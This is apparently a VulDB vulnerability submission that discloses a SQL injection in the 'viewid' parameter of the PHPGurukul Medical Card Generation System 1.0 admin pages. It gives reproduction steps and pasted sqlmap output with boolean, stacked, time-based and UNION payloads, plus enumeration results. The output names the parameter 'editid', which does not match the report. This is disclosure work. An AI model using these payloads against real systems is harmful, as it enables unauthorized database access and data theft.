| Titolo | PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection |
|---|
| Descrizione | I would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing.
Details:
Affected URL/Endpoint: /mcgs/admin/view-card-detail.php?viewid=1, /mcgs/admin/view-enquiry.php?viewid=1
Vulnerable Parameter: 'viewid'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Sign in as admin.
2) Navigate to Managecard > Action 'View'
3) Use a proxy like burpsuite to intercept the request.
4) Input the payload to invoke the SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: editid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: editid=1 AND 3139=3139
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: editid=1;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:02:51] [INFO] the back-end DBMS is MySQL
[11:02:51] [INFO] fetching banner
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 5.0.12
banner: '8.3.0'
[11:02:51] [INFO] fetching current user
current user: 'root@localhost'
[11:02:51] [INFO] fetching current database
current database: 'mgsdb'
Please let me know if you need further information or a more detailed analysis. |
|---|
| Utente | Delvy (UID 74555) |
|---|
| Sottomissione | 21/10/2024 05:03 (2 anni fa) |
|---|
| Moderazione | 23/10/2024 13:05 (2 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 281567 [PHPGurukul Medical Card Generation System 1.0 View Enquiry Page /admin/view-enquiry.php viewid iniezione SQL] |
|---|
| Punti | 17 |
|---|